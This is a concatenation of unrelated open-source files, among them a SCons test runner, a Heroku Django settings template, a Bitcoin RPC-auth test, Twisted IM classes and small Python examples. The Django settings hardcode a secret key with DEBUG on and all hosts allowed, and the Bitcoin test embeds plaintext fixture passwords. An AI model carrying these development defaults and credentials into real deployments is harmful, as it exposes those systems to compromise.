tempdir = tempfile.mktemp()
if not os.path.exists(tempdir):
os.mkdir(tempdir)
def cleanup(tempdir=tempdir):
import shutil
os.chdir(startdir)
shutil.rmtree(tempdir)
sys.exitfunc = cleanup
# Fetch the input file if it happens to be across a network somewhere.
# Ohmigod, does Python make this simple...
inputfile, headers = urlretrieve(inputfile)
# Unzip the header file in the output directory. We use our own code
# (lifted from scons-unzip.py) to make the output subdirectory name
# match the basename of the .zip file.
zf = zipfile.ZipFile(inputfile, 'r')
if outdir is None:
name, _ = os.path.splitext(os.path.basename(inputfile))
outdir = os.path.join(tempdir, name)
def outname(n, outdir=outdir):
l = []
while True:
n, tail = os.path.split(n)
if not n:
break
l.append(tail)
l.append(outdir)
l.reverse()
return os.path.join(*l)
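# For example (assuming a typical zip entry name), the archive's leading
# directory is replaced by outdir:
#   outname('scons-src-1.0/src/script/scons')
#   -> os.path.join(outdir, 'src', 'script', 'scons')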
for name in zf.namelist():
dest = outname(name)
dir = os.path.dirname(dest)
try:
os.makedirs(dir)
except:
pass
printname(dest)
# if the file exists, then delete it before writing
# to it so that we don't end up trying to write to a symlink:
if os.path.isfile(dest) or os.path.islink(dest):
os.unlink(dest)
if not os.path.isdir(dest):
open(dest, 'w').write(zf.read(name))
os.chdir(outdir)
# Load (by hand) the SCons modules we just unwrapped so we can
# extract their version information. Note that we have to override
# SCons.Script.main() with a do_nothing() function, because loading up
# the 'scons' script will actually try to execute SCons...
src_script = os.path.join(outdir, 'src', 'script')
src_engine = os.path.join(outdir, 'src', 'engine')
src_engine_SCons = os.path.join(src_engine, 'SCons')
fp, pname, desc = imp.find_module('SCons', [src_engine])
SCons = imp.load_module('SCons', fp, pname, desc)
fp, pname, desc = imp.find_module('Script', [src_engine_SCons])
SCons.Script = imp.load_module('Script', fp, pname, desc)
def do_nothing():
pass
SCons.Script.main = do_nothing
fp, pname, desc = imp.find_module('scons', [src_script])
scons = imp.load_module('scons', fp, pname, desc)
fp.close()
# Default is to run all the tests by passing the -a flags to runtest.py.
if not args:
runtest_args = '-a'
else:
runtest_args = ' '.join(args)
if format == '--xml':
print "<scons_test_run>"
print " <sys>"
sys_keys = ['byteorder', 'exec_prefix', 'executable', 'maxint', 'maxunicode', 'platform', 'prefix', 'version', 'version_info']
for k in sys_keys:
print " <%s>%s</%s>" % (k, sys.__dict__[k], k)
print " </sys>"
fmt = '%a %b %d %H:%M:%S %Y'
print " <time>"
print " <gmtime>%s</gmtime>" % time.strftime(fmt, time.gmtime())
print " <localtime>%s</localtime>" % time.strftime(fmt, time.localtime())
print " </time>"
print " <tempdir>%s</tempdir>" % tempdir
def print_version_info(tag, module):
print " <%s>" % tag
print " <version>%s</version>" % module.__version__
print " <build>%s</build>" % module.__build__
print " <buildsys>%s</buildsys>" % module.__buildsys__
print " <date>%s</date>" % module.__date__
print " <developer>%s</developer>" % module.__developer__
print " </%s>" % tag
print " <scons>"
print_version_info("script", scons)
print_version_info("engine", SCons)
print " </scons>"
environ_keys = [
'PATH',
'SCONSFLAGS',
'SCONS_LIB_DIR',
'PYTHON_ROOT',
'QTDIR',
'COMSPEC',
'INTEL_LICENSE_FILE',
'INCLUDE',
'LIB',
'MSDEVDIR',
'OS',
'PATHEXT',
'SystemRoot',
'TEMP',
'TMP',
'USERNAME',
'VXDOMNTOOLS',
'WINDIR',
    'XYZZY',
    'ENV',
'HOME',
'LANG',
'LANGUAGE',
'LOGNAME',
'MACHINE',
'OLDPWD',
'PWD',
'OPSYS',
'SHELL',
'TMPDIR',
'USER',
]
print " <environment>"
for key in sorted(environ_keys):
value = os.environ.get(key)
if value:
print " <variable>"
print " <name>%s</name>" % key
print " <value>%s</value>" % value
print " </variable>"
print " </environment>"
command = '"%s" runtest.py -q -o - --xml %s' % (sys.executable, runtest_args)
#print command
os.system(command)
print "</scons_test_run>"
else:
def print_version_info(tag, module):
print "\t%s: v%s.%s, %s, by %s on %s" % (tag,
module.__version__,
module.__build__,
module.__date__,
module.__developer__,
module.__buildsys__)
print "SCons by Steven Knight et al.:"
print_version_info("script", scons)
print_version_info("engine", SCons)
command = '"%s" runtest.py %s' % (sys.executable, runtest_args)
#print command
os.system(command)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| {
"content_hash": "fa385c9cf58789c65b250c6962b04888",
"timestamp": "",
"source": "github",
"line_count": 235,
"max_line_length": 130,
"avg_line_length": 28.52340425531915,
"alnum_prop": 0.551544084738177,
"repo_name": "azatoth/scons",
"id": "2191532c7f6a2c1b62a371bcb87b8d9ddcd41a49",
"size": "7415",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "bin/scons-test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "259"
},
{
"name": "JavaScript",
"bytes": "17316"
},
{
"name": "Perl",
"bytes": "45214"
},
{
"name": "Python",
"bytes": "6716123"
},
{
"name": "Shell",
"bytes": "2535"
}
],
"symlink_target": ""
} |
"""
Django settings for gettingstarted project, on Heroku. For more info, see:
https://github.com/heroku/heroku-django-template
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
import os
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'i+acxn5(akgsn!sr4^qgf(^m&*@+g1@u^t@=8s@axc41ml*f=s'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'hello'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'gettingstarted.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'gettingstarted.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Parse database configuration from $DATABASE_URL
DATABASES['default'] = dj_database_url.config()
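# dj_database_url reads the DATABASE_URL environment variable, e.g.
# postgres://user:password@host:5432/dbname (placeholder value only), and
# returns an empty config when the variable is unset.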
# Enable Connection Pooling (if desired)
DATABASES['default']['ENGINE'] = 'django_postgrespool'
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Allow all host headers
ALLOWED_HOSTS = ['*']
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = 'staticfiles'
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
# Simplified static file serving.
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
| {
"content_hash": "c1bf9bfcb441f5be7b61c5b50d55c99a",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 75,
"avg_line_length": 27.647540983606557,
"alnum_prop": 0.7032315446190335,
"repo_name": "toroio-alex/heroku-python",
"id": "24b9558ecbd00a0927139c6fb1b2df4d106791fd",
"size": "3373",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "gettingstarted/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "6887"
},
{
"name": "Python",
"bytes": "5231"
}
],
"symlink_target": ""
} |
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest(BitcoinTestFramework):
def setup_nodes(self):
return start_nodes(4, self.options.tmpdir)
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain(self.options.tmpdir)
#Append rpcauth to bitcoin.conf before initialization
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
rpcauth2 = "rpcauth=rt2:f8607b1a88861fac29dfccf9b52ff9f$ff36a0c23c8c62b4846112e50fa888416e94c17bfd4c42f88fd8f55ec6a3137e"
with open(os.path.join(self.options.tmpdir+"/node0", "bitcoin.conf"), 'a') as f:
f.write(rpcauth+"\n")
f.write(rpcauth2+"\n")
def run_test(self):
##################################################
# Check correctness of the rpcauth config option #
##################################################
url = urllib.parse.urlparse(self.nodes[0].url)
#Old authpair
authpair = url.username + ':' + url.password
#New authpair generated via share/rpcuser tool
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
password = "cA773lm788buwYe4g4WT+05pKyNruVKjQ25x3n0DQcM="
#Second authpair with different username
rpcauth2 = "rpcauth=rt2:f8607b1a88861fac29dfccf9b52ff9f$ff36a0c23c8c62b4846112e50fa888416e94c17bfd4c42f88fd8f55ec6a3137e"
password2 = "8/F3uMDw4KSEbw96U3CA1C4X05dkHDN2BPFjTgZW4KI="
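        # Format sketch: each rpcauth line above packs
        # "<user>:<salt>$<hex hmac-sha256(key=salt, msg=password)>"; the
        # share/rpcuser helper in the Bitcoin tree prints a matching rpcauth
        # line and password pair.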
authpairnew = "rt:"+password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, False)
conn.close()
#Use new authpair to confirm both work
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, False)
conn.close()
#Wrong login name with rt's password
authpairnew = "rtwrong:"+password
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, True)
conn.close()
#Wrong password for rt
authpairnew = "rt:"+password+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, True)
conn.close()
#Correct for rt2
authpairnew = "rt2:"+password2
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, False)
conn.close()
#Wrong password for rt2
authpairnew = "rt2:"+password2+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status==401, True)
conn.close()
if __name__ == '__main__':
    HTTPBasicsTest().main()
| {
"content_hash": "450eaca745cbeaf45ab1d4c550810d94",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 129,
"avg_line_length": 40.25714285714286,
"alnum_prop": 0.6323633782824698,
"repo_name": "BTCfork/hardfork_prototype_1_mvf-bu",
"id": "133d89ad6dfaa5941005a808be73512f68340899",
"size": "4548",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "qa/rpc-tests/multi_rpc.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "28456"
},
{
"name": "C",
"bytes": "682360"
},
{
"name": "C++",
"bytes": "5102661"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "HTML",
"bytes": "50622"
},
{
"name": "Java",
"bytes": "30290"
},
{
"name": "M4",
"bytes": "189719"
},
{
"name": "Makefile",
"bytes": "111286"
},
{
"name": "Objective-C",
"bytes": "5785"
},
{
"name": "Objective-C++",
"bytes": "7360"
},
{
"name": "Protocol Buffer",
"bytes": "2308"
},
{
"name": "Python",
"bytes": "962519"
},
{
"name": "QMake",
"bytes": "2020"
},
{
"name": "Roff",
"bytes": "3821"
},
{
"name": "Shell",
"bytes": "44285"
}
],
"symlink_target": ""
} |
import os
import platform
def provide_system_boot_type():
if platform.system() == 'Linux':
# See also:
# http://askubuntu.com/a/162896
if os.path.exists('/sys/firmware/efi'):
return { 'system_boot_type': 'UEFI' }
else:
return { 'system_boot_type': 'BIOS' }
else:
return { 'system_boot_type': False }
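# Usage sketch (hypothetical minion-side query; the grain name comes from the
# dictionary key returned above):
#   salt-call grains.get system_boot_type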
| {
"content_hash": "2cccf7dfb9a31988d0a58ba0c72fd79b",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 49,
"avg_line_length": 25.133333333333333,
"alnum_prop": 0.5464190981432361,
"repo_name": "uvsmtid/common-salt-states",
"id": "a11d82234b9c526266e33b03debc20d1eacb0712",
"size": "378",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "states/_grains/system_boot_type.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "7830"
},
{
"name": "Erlang",
"bytes": "21224"
},
{
"name": "Java",
"bytes": "987"
},
{
"name": "Python",
"bytes": "307941"
},
{
"name": "Ruby",
"bytes": "20793"
},
{
"name": "SaltStack",
"bytes": "1039440"
},
{
"name": "Scheme",
"bytes": "5298"
},
{
"name": "Shell",
"bytes": "50876"
},
{
"name": "VimL",
"bytes": "3502"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
result = Ship()
result.template = "object/ship/shared_blacksun_heavy_s03.iff"
result.attribute_template_id = -1
result.stfName("","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
	return result
| {
"content_hash": "ed6ef71c96a7e91ae9ecf253f2ccaa10",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 62,
"avg_line_length": 20.76923076923077,
"alnum_prop": 0.6666666666666666,
"repo_name": "obi-two/Rebelion",
"id": "cdafa95485f24e5e8be00d19ae90a91525a59b87",
"size": "415",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/ship/shared_blacksun_heavy_s03.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
"""
RenderPipeline
Copyright (c) 2014-2016 tobspr <tobias.springer1@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from panda3d.core import CardMaker, Vec2, GraphicsWindow
from rpcore.rpobject import RPObject
from rpcore.globals import Globals
from rpcore.loader import RPLoader
class PixelInspector(RPObject):
""" Widget to analyze the rendered pixels, by zooming in """
def __init__(self, pipeline):
RPObject.__init__(self)
self._pipeline = pipeline
self._node = Globals.base.pixel2d.attach_new_node("ExposureWidgetNode")
self._create_components()
self.hide()
def _create_components(self):
""" Internal method to init the widgets components """
card_maker = CardMaker("PixelInspector")
card_maker.set_frame(-200, 200, -150, 150)
self._zoomer = self._node.attach_new_node(card_maker.generate())
# Defer the further loading
Globals.base.taskMgr.doMethodLater(
1.0, self._late_init, "PixelInspectorLateInit")
Globals.base.accept("q", self.show)
Globals.base.accept("q-up", self.hide)
def show(self):
""" Shows the inspector """
self._node.show()
def hide(self):
""" Shows the inspector """
self._node.hide()
def _late_init(self, task):
""" Gets called after the pipeline got initialized """
scene_tex = self._pipeline.stage_mgr.pipes["ShadedScene"]
self._zoomer.set_shader(RPLoader.load_shader(
"/$$rp/shader/default_gui_shader.vert.glsl",
"/$$rp/shader/pixel_inspector.frag.glsl"))
self._zoomer.set_shader_input("SceneTex", scene_tex)
return task.done
def update(self):
""" Updates the pixel preview """
if isinstance(Globals.base.win, GraphicsWindow):
mouse = Globals.base.win.get_pointer(0)
if mouse.get_in_window():
pos = mouse.get_x(), 1, -mouse.get_y()
rel_mouse_pos = Vec2(mouse.get_x(), Globals.base.win.get_y_size() - mouse.get_y())
self._node.set_pos(pos)
self._zoomer.set_shader_input("mousePos", rel_mouse_pos)
| {
"content_hash": "cbda035d5167bff119eb795c6e1356fc",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 98,
"avg_line_length": 40.6375,
"alnum_prop": 0.6607197785296832,
"repo_name": "croxis/SpaceDrive",
"id": "7bed13ab75f3530e9b7c8e9fafe0ceda9f63e840",
"size": "3251",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spacedrive/renderpipeline/rpcore/gui/pixel_inspector.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1288"
},
{
"name": "C",
"bytes": "21897"
},
{
"name": "C++",
"bytes": "165025"
},
{
"name": "GLSL",
"bytes": "741524"
},
{
"name": "Groff",
"bytes": "119"
},
{
"name": "Python",
"bytes": "1523574"
}
],
"symlink_target": ""
} |
#
"""Instance Messenger base classes for protocol support.
You will find these useful if you're adding a new protocol to IM.
"""
# Abstract representation of chat "model" classes
from twisted.words.im.locals import ONLINE, OFFLINE, OfflineError
from twisted.words.im import interfaces
from twisted.internet.protocol import Protocol
from twisted.python.reflect import prefixedMethods
from twisted.persisted import styles
from twisted.internet import error
class AbstractGroup:
def __init__(self, name, account):
self.name = name
self.account = account
def getGroupCommands(self):
"""finds group commands
these commands are methods on me that start with imgroup_; they are
called with no arguments
"""
return prefixedMethods(self, "imgroup_")
def getTargetCommands(self, target):
"""finds group commands
these commands are methods on me that start with imgroup_; they are
called with a user present within this room as an argument
you may want to override this in your group in order to filter for
appropriate commands on the given user
"""
return prefixedMethods(self, "imtarget_")
def join(self):
if not self.account.client:
raise OfflineError
self.account.client.joinGroup(self.name)
def leave(self):
if not self.account.client:
raise OfflineError
self.account.client.leaveGroup(self.name)
def __repr__(self):
return '<%s %r>' % (self.__class__, self.name)
def __str__(self):
return '%s@%s' % (self.name, self.account.accountName)
class AbstractPerson:
def __init__(self, name, baseAccount):
self.name = name
self.account = baseAccount
self.status = OFFLINE
def getPersonCommands(self):
"""finds person commands
these commands are methods on me that start with imperson_; they are
called with no arguments
"""
return prefixedMethods(self, "imperson_")
def getIdleTime(self):
"""
Returns a string.
"""
return '--'
def __repr__(self):
return '<%s %r/%s>' % (self.__class__, self.name, self.status)
def __str__(self):
return '%s@%s' % (self.name, self.account.accountName)
class AbstractClientMixin:
"""Designed to be mixed in to a Protocol implementing class.
Inherit from me first.
@ivar _logonDeferred: Fired when I am done logging in.
"""
def __init__(self, account, chatui, logonDeferred):
for base in self.__class__.__bases__:
if issubclass(base, Protocol):
self.__class__._protoBase = base
break
else:
pass
self.account = account
self.chat = chatui
self._logonDeferred = logonDeferred
def connectionMade(self):
self._protoBase.connectionMade(self)
def connectionLost(self, reason):
self.account._clientLost(self, reason)
self.unregisterAsAccountClient()
return self._protoBase.connectionLost(self, reason)
def unregisterAsAccountClient(self):
"""Tell the chat UI that I have `signed off'.
"""
self.chat.unregisterAccountClient(self)
class AbstractAccount(styles.Versioned):
"""Base class for Accounts.
I am the start of an implementation of L{IAccount<interfaces.IAccount>}, I
implement L{isOnline} and most of L{logOn}, though you'll need to implement
L{_startLogOn} in a subclass.
@cvar _groupFactory: A Callable that will return a L{IGroup} appropriate
for this account type.
@cvar _personFactory: A Callable that will return a L{IPerson} appropriate
for this account type.
@type _isConnecting: boolean
@ivar _isConnecting: Whether I am in the process of establishing a
connection to the server.
@type _isOnline: boolean
@ivar _isOnline: Whether I am currently on-line with the server.
@ivar accountName:
@ivar autoLogin:
@ivar username:
@ivar password:
@ivar host:
@ivar port:
"""
_isOnline = 0
_isConnecting = 0
client = None
_groupFactory = AbstractGroup
_personFactory = AbstractPerson
    persistenceVersion = 2
def __init__(self, accountName, autoLogin, username, password, host, port):
self.accountName = accountName
self.autoLogin = autoLogin
self.username = username
self.password = password
self.host = host
self.port = port
self._groups = {}
self._persons = {}
    def upgradeToVersion2(self):
# Added in CVS revision 1.16.
for k in ('_groups', '_persons'):
if not hasattr(self, k):
setattr(self, k, {})
def __getstate__(self):
state = styles.Versioned.__getstate__(self)
for k in ('client', '_isOnline', '_isConnecting'):
try:
del state[k]
except KeyError:
pass
return state
def isOnline(self):
return self._isOnline
def logOn(self, chatui):
"""Log on to this account.
Takes care to not start a connection if a connection is
already in progress. You will need to implement
L{_startLogOn} for this to work, and it would be a good idea
to override L{_loginFailed} too.
@returntype: Deferred L{interfaces.IClient}
"""
if (not self._isConnecting) and (not self._isOnline):
self._isConnecting = 1
d = self._startLogOn(chatui)
d.addCallback(self._cb_logOn)
# if chatui is not None:
# (I don't particularly like having to pass chatUI to this function,
# but we haven't factored it out yet.)
d.addCallback(chatui.registerAccountClient)
d.addErrback(self._loginFailed)
return d
else:
raise error.ConnectError("Connection in progress")
def getGroup(self, name):
"""Group factory.
@param name: Name of the group on this account.
@type name: string
"""
group = self._groups.get(name)
if group is None:
group = self._groupFactory(name, self)
self._groups[name] = group
return group
def getPerson(self, name):
"""Person factory.
@param name: Name of the person on this account.
@type name: string
"""
person = self._persons.get(name)
if person is None:
person = self._personFactory(name, self)
self._persons[name] = person
return person
def _startLogOn(self, chatui):
"""Start the sign on process.
Factored out of L{logOn}.
@returntype: Deferred L{interfaces.IClient}
"""
raise NotImplementedError()
def _cb_logOn(self, client):
self._isConnecting = 0
self._isOnline = 1
self.client = client
return client
def _loginFailed(self, reason):
"""Errorback for L{logOn}.
@type reason: Failure
@returns: I{reason}, for further processing in the callback chain.
@returntype: Failure
"""
self._isConnecting = 0
self._isOnline = 0 # just in case
return reason
def _clientLost(self, client, reason):
self.client = None
self._isConnecting = 0
self._isOnline = 0
return reason
def __repr__(self):
return "<%s: %s (%s@%s:%s)>" % (self.__class__,
self.accountName,
self.username,
self.host,
self.port)
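
# Editor's sketch (not part of Twisted): a minimal AbstractAccount subclass
# illustrating the contract documented above -- only _startLogOn needs to be
# supplied, and it must return a Deferred that fires with the protocol
# client. All names below are invented for illustration.
class _ExampleAccount(AbstractAccount):
    def _startLogOn(self, chatui):
        from twisted.internet import defer
        # A real implementation would open a connection here; this sketch
        # pretends the client object is immediately available.
        return defer.succeed(object())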
| {
"content_hash": "e652cacb3980530523e373e9ff037666",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 80,
"avg_line_length": 30.171641791044777,
"alnum_prop": 0.5750680187979224,
"repo_name": "hlzz/dotfiles",
"id": "be1368e22948783e5e555a86287a63dfb408480a",
"size": "8160",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "graphics/VTK-7.0.0/ThirdParty/Twisted/twisted/words/im/basesupport.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "AppleScript",
"bytes": "1240"
},
{
"name": "Arc",
"bytes": "38"
},
{
"name": "Assembly",
"bytes": "449468"
},
{
"name": "Batchfile",
"bytes": "16152"
},
{
"name": "C",
"bytes": "102303195"
},
{
"name": "C++",
"bytes": "155056606"
},
{
"name": "CMake",
"bytes": "7200627"
},
{
"name": "CSS",
"bytes": "179330"
},
{
"name": "Cuda",
"bytes": "30026"
},
{
"name": "D",
"bytes": "2152"
},
{
"name": "Emacs Lisp",
"bytes": "14892"
},
{
"name": "FORTRAN",
"bytes": "5276"
},
{
"name": "Forth",
"bytes": "3637"
},
{
"name": "GAP",
"bytes": "14495"
},
{
"name": "GLSL",
"bytes": "438205"
},
{
"name": "Gnuplot",
"bytes": "327"
},
{
"name": "Groff",
"bytes": "518260"
},
{
"name": "HLSL",
"bytes": "965"
},
{
"name": "HTML",
"bytes": "2003175"
},
{
"name": "Haskell",
"bytes": "10370"
},
{
"name": "IDL",
"bytes": "2466"
},
{
"name": "Java",
"bytes": "219109"
},
{
"name": "JavaScript",
"bytes": "1618007"
},
{
"name": "Lex",
"bytes": "119058"
},
{
"name": "Lua",
"bytes": "23167"
},
{
"name": "M",
"bytes": "1080"
},
{
"name": "M4",
"bytes": "292475"
},
{
"name": "Makefile",
"bytes": "7112810"
},
{
"name": "Matlab",
"bytes": "1582"
},
{
"name": "NSIS",
"bytes": "34176"
},
{
"name": "Objective-C",
"bytes": "65312"
},
{
"name": "Objective-C++",
"bytes": "269995"
},
{
"name": "PAWN",
"bytes": "4107117"
},
{
"name": "PHP",
"bytes": "2690"
},
{
"name": "Pascal",
"bytes": "5054"
},
{
"name": "Perl",
"bytes": "485508"
},
{
"name": "Pike",
"bytes": "1338"
},
{
"name": "Prolog",
"bytes": "5284"
},
{
"name": "Python",
"bytes": "16799659"
},
{
"name": "QMake",
"bytes": "89858"
},
{
"name": "Rebol",
"bytes": "291"
},
{
"name": "Ruby",
"bytes": "21590"
},
{
"name": "Scilab",
"bytes": "120244"
},
{
"name": "Shell",
"bytes": "2266191"
},
{
"name": "Slash",
"bytes": "1536"
},
{
"name": "Smarty",
"bytes": "1368"
},
{
"name": "Swift",
"bytes": "331"
},
{
"name": "Tcl",
"bytes": "1911873"
},
{
"name": "TeX",
"bytes": "11981"
},
{
"name": "Verilog",
"bytes": "3893"
},
{
"name": "VimL",
"bytes": "595114"
},
{
"name": "XSLT",
"bytes": "62675"
},
{
"name": "Yacc",
"bytes": "307000"
},
{
"name": "eC",
"bytes": "366863"
}
],
"symlink_target": ""
} |
from pythonds.trees.binaryTree import BinaryTree
import operator
x = BinaryTree('*')
x.insertLeft('+')
l = x.getLeftChild()
l.insertLeft(4)
l.insertRight(5)
x.insertRight(7)
def printexp(tree):
sVal = ""
if tree:
sVal = '(' + printexp(tree.getLeftChild())
sVal = sVal + str(tree.getRootVal())
sVal = sVal + printexp(tree.getRightChild())+')'
return sVal
def postordereval(tree):
opers = {'+':operator.add, '-':operator.sub, '*':operator.mul, '/':operator.truediv}
res1 = None
res2 = None
if tree:
res1 = postordereval(tree.getLeftChild())
res2 = postordereval(tree.getRightChild())
        if res1 is not None and res2 is not None:  # 0 is a valid operand; test for None, not truthiness
return opers[tree.getRootVal()](res1,res2)
else:
return tree.getRootVal()
print(printexp(x))
print(postordereval(x))
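
# Worked check (editor's addition): the tree built above encodes (4 + 5) * 7.
# postordereval visits children first: 4 + 5 = 9, then 9 * 7 = 63, while
# printexp parenthesises every subtree, including the leaves.
assert postordereval(x) == 63
assert printexp(x) == '(((4)+(5))*(7))'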
| {
"content_hash": "6a8a5798de5aef0860f29179b9b0ce3e",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 86,
"avg_line_length": 23.5,
"alnum_prop": 0.6470588235294118,
"repo_name": "robin1885/algorithms-exercises-using-python",
"id": "ea41d9356024cdc7ce381cfcf4197fa438aaafc1",
"size": "799",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "source-code-from-author-book/Chapter6/treeexample.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "182896"
}
],
"symlink_target": ""
} |
"""Test Hierarchical Deterministic wallet function."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class WalletHDTest(BitcoinTestFramework):
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 2)
def setup_network(self):
self.nodes = start_nodes(2, self.options.tmpdir, [['-usehd=0'], ['-usehd=1', '-keypool=0']])
self.is_network_split = False
connect_nodes_bi(self.nodes, 0, 1)
